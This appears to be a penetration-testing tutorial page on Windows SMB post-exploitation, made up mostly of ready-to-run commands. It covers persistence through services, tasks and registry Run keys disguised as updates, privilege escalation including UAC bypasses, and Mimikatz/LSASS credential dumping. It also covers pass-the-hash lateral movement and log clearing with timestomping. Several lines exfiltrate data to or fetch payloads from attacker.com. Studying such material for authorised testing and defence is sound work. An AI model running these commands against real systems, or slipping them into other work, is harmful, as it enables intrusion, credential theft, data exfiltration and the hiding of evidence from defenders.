Phase 4: Maintain Access & Expand

SMB Post-Exploitation

Advanced post-exploitation techniques for SMB environments. Learn to maintain persistent access, escalate privileges, and move laterally through networks.

Persistence Mechanisms

Maintain long-term access through various persistence techniques

Privilege Escalation

Escalate privileges to gain administrative or SYSTEM access

Lateral Movement

Move through the network to compromise additional systems

Persistence

Persistence Mechanisms

Establish and maintain long-term access to compromised systems

Service-Based Persistence

# Create persistent service (Windows)
sc create "WindowsUpdate" binpath= "C:\\Windows\\System32\\backdoor.exe" start= auto
sc description "WindowsUpdate" "Critical Windows Update Service"
sc start "WindowsUpdate"

# Alternative with PowerShell
New-Service -Name "SystemHealth" -BinaryPathName "C:\\Windows\\Temp\\backdoor.exe" -StartupType Automatic
Start-Service -Name "SystemHealth"

# Verify service creation
sc query "WindowsUpdate"

Services provide reliable persistence as they automatically start with the system and run with elevated privileges.

Scheduled Task Persistence

# Create scheduled task for persistence
schtasks /create /tn "SystemMaintenance" /tr "C:\\Windows\\System32\\backdoor.exe" /sc onstart /ru system

# Daily execution task
schtasks /create /tn "DailyCleanup" /tr "powershell.exe -WindowStyle Hidden -File C:\\temp\\payload.ps1" /sc daily /st 09:00

# Task triggered by user logon
schtasks /create /tn "UserProfile" /tr "C:\\temp\\backdoor.exe" /sc onlogon

# List created tasks
schtasks /query /tn "SystemMaintenance"

Scheduled tasks provide flexible persistence options with various trigger conditions and execution contexts.

Registry-Based Persistence

# Registry Run key persistence
reg add "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\\Windows\\System32\\backdoor.exe"

# User-specific persistence
reg add "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /v "UserAgent" /t REG_SZ /d "C:\\Users\\Public\\agent.exe"

# Service registry modification
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\Backdoor" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\\Windows\\System32\\backdoor.exe"

Registry persistence is stealthy and survives reboots, making it ideal for long-term access.

Privilege Escalation

Privilege Escalation Techniques

Escalate from limited user access to administrative or SYSTEM privileges

Token Impersonation

# Meterpreter token impersonation
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

# Alternative with PowerShell
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\\SYSTEM"

# Check current privileges
meterpreter > getuid
whoami /priv

Token impersonation allows assuming the security context of other users or system accounts.

Unquoted Service Path Exploitation

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows\\" | findstr /i /v """

# Check directory permissions
icacls "C:\\Program Files\\Vulnerable Service\\"

# Place malicious executable
copy backdoor.exe "C:\\Program Files\\Vulnerable.exe"

# Restart service to trigger execution
sc stop "VulnerableService"
sc start "VulnerableService"

Unquoted service paths can be exploited when services have spaces in their paths without proper quoting.

Weak Service Permissions

# Check service permissions with accesschk
accesschk.exe -uwcqv "Authenticated Users" * | findstr /i "service"

# Check specific service permissions
accesschk.exe -ucqv "VulnerableService"

# Modify service binary path
sc config "VulnerableService" binpath= "C:\\Windows\\System32\\backdoor.exe"

# Restart service
sc stop "VulnerableService"
sc start "VulnerableService"

Services with weak permissions allow modification of their configuration or binary paths.

UAC Bypass Techniques

# UAC bypass with fodhelper
reg add "HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command" /v "DelegateExecute" /t REG_SZ
reg add "HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command" /ve /d "C:\\Windows\\System32\\cmd.exe" /t REG_SZ
fodhelper.exe

# UAC bypass with eventvwr
reg add "HKCU\\Software\\Classes\\mscfile\\shell\\open\\command" /ve /d "C:\\Windows\\System32\\cmd.exe" /t REG_SZ
eventvwr.exe

UAC bypass techniques exploit trusted Windows binaries to execute code with elevated privileges.

Lateral Movement

Lateral Movement Techniques

Move through the network to compromise additional systems and expand access

Pass-the-Hash Lateral Movement

# Extract hashes with Mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Pass-the-hash with CrackMapExec
crackmapexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# Execute commands on remote systems
crackmapexec smb 192.168.1.100 -u administrator -H <hash> -x "whoami"

# Dump additional credentials
crackmapexec smb 192.168.1.100 -u administrator -H <hash> --sam

Pass-the-hash allows authentication to other systems using captured NTLM hashes without plaintext passwords.

PSExec and Remote Execution

# PSExec with valid credentials
psexec.py domain/username:password@192.168.1.100

# PSExec with hash authentication
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 administrator@192.168.1.100

# WMI execution
wmiexec.py domain/username:password@192.168.1.100

# SMB execution
smbexec.py domain/username:password@192.168.1.100

Remote execution tools provide interactive shells on target systems through various protocols.

WinRM and PowerShell Remoting

# PowerShell remoting session
$cred = Get-Credential
Enter-PSSession -ComputerName 192.168.1.100 -Credential $cred

# Execute commands remotely
Invoke-Command -ComputerName 192.168.1.100 -Credential $cred -ScriptBlock {whoami}

# WinRM with evil-winrm
evil-winrm -i 192.168.1.100 -u administrator -p password

# WinRM with hash
evil-winrm -i 192.168.1.100 -u administrator -H <hash>

WinRM provides legitimate remote management capabilities that can be leveraged for lateral movement.

Data Exfiltration

Data Exfiltration Techniques

Extract sensitive data and credentials from compromised systems

Credential Dumping

# Dump SAM database
reg save HKLM\\SAM C:\\temp\\sam.hive
reg save HKLM\\SYSTEM C:\\temp\\system.hive

# Extract hashes with secretsdump
secretsdump.py -sam sam.hive -system system.hive LOCAL

# Dump LSASS memory with Mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Alternative LSASS dump
procdump.exe -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"

Credential dumping extracts stored passwords and hashes for further lateral movement.

File System Access and Exfiltration

# Search for sensitive files
dir /s /b C:\\ | findstr /i "password"
dir /s /b C:\\ | findstr /i "config"

# Download files via SMB
smbget -R smb://192.168.1.100/C$/Users/ -U administrator

# Compress and exfiltrate data
powershell Compress-Archive -Path "C:\\Sensitive\\*" -DestinationPath "C:\\temp\\data.zip"

# Exfiltrate via HTTP
powershell Invoke-WebRequest -Uri "http://attacker.com/upload" -Method POST -InFile "C:\\temp\\data.zip"

Systematic file system access allows identification and exfiltration of sensitive business data.

Active Directory Enumeration

# Domain enumeration with PowerView
Get-Domain
Get-DomainUser | Select-Object name,description
Get-DomainGroup | Select-Object name,description

# BloodHound data collection
SharpHound.exe -c All

# LDAP enumeration
ldapsearch -x -H ldap://dc.domain.com -D "domain\\user" -W -b "dc=domain,dc=com"

# Export domain data
crackmapexec ldap dc.domain.com -u username -p password --users
crackmapexec ldap dc.domain.com -u username -p password --groups

Active Directory enumeration reveals domain structure, users, groups, and potential attack paths.

Stealth Operations

Covering Tracks & Stealth

Maintain stealth and avoid detection during post-exploitation activities

Log Manipulation

# Clear Windows event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# Clear specific log entries
Get-WinEvent -FilterHashtable @{LogName="Security"; ID=4624} | Remove-WinEvent

# Disable logging temporarily
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable

# Clear command history
Clear-History
Remove-Item (Get-PSReadlineOption).HistorySavePath

Log manipulation helps avoid detection by removing evidence of malicious activities.

Timestomping and File Manipulation

# Modify file timestamps
meterpreter > timestomp C:\\backdoor.exe -f C:\\Windows\\System32\\calc.exe

# PowerShell timestamp modification
$(Get-Item "C:\\backdoor.exe").CreationTime = "01/01/2020 12:00:00"
$(Get-Item "C:\\backdoor.exe").LastWriteTime = "01/01/2020 12:00:00"

# Hide files with attributes
attrib +h +s C:\\backdoor.exe

# Create alternate data streams
echo "malicious content" > C:\\legitimate.txt:hidden.exe

File manipulation techniques help blend malicious files with legitimate system files.

Process and Memory Evasion

# Process hollowing
meterpreter > migrate <legitimate_process_pid>

# In-memory execution
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://attacker.com/payload.ps1'))"

# Reflective DLL injection
meterpreter > use post/windows/manage/reflective_dll_inject

# Living off the land techniques
rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://attacker.com/payload.sct")

Memory-based execution and process manipulation help avoid file-based detection mechanisms.

Essential Tools

Metasploit

Post-exploitation modules and Meterpreter

Framework

CrackMapExec

Lateral movement and credential dumping

Lateral Movement

Mimikatz

Credential extraction and manipulation

Credential Theft

BloodHound

Active Directory attack path analysis

Reconnaissance

PowerShell Empire

PowerShell-based post-exploitation framework

Framework

Cobalt Strike

Commercial adversary simulation platform

Commercial

Next Steps

CVE Research

Research additional vulnerabilities for expanded access

Reconnaissance

Restart the cycle for newly discovered systems

Additional Resources

MITRE ATT&CK

Framework for understanding adversary tactics

OWASP Testing Guide

Comprehensive security testing methodology

Tenable Solutions

Professional vulnerability management

SMB Penetration Testing Learning Path

Comprehensive SMB security assessment methodology from reconnaissance to post-exploitation

Beginner

SMB Protocol Fundamentals

Master SMB/CIFS protocol architecture, versions, and security mechanisms

SMB protocol security testing

CIFS security assessment

Learn More

Intermediate

SMB Reconnaissance & Enumeration

Learn SMB enumeration techniques, null session testing, and share discovery

SMB enumeration techniques

SMB null session enumeration

Learn More

Intermediate

SMB Vulnerability Analysis

Identify SMB security vulnerabilities and assess enterprise Windows security

SMB vulnerability scanning

SMB security assessment

Learn More

Advanced

SMB Exploitation Techniques

Master EternalBlue, SMBGhost, and advanced SMB attack methodologies

EternalBlue SMB exploit

SMBGhost vulnerability testing

Learn More

Advanced

SMB Post-Exploitation

Learn persistence, lateral movement, and privilege escalation in SMB environments

SMB lateral movement testing

Windows credential harvesting

Current Page

Reference

SMB CVE Database

Research critical SMB vulnerabilities and exploitation techniques

MS17-010 penetration testing

SMB remote code execution

Learn More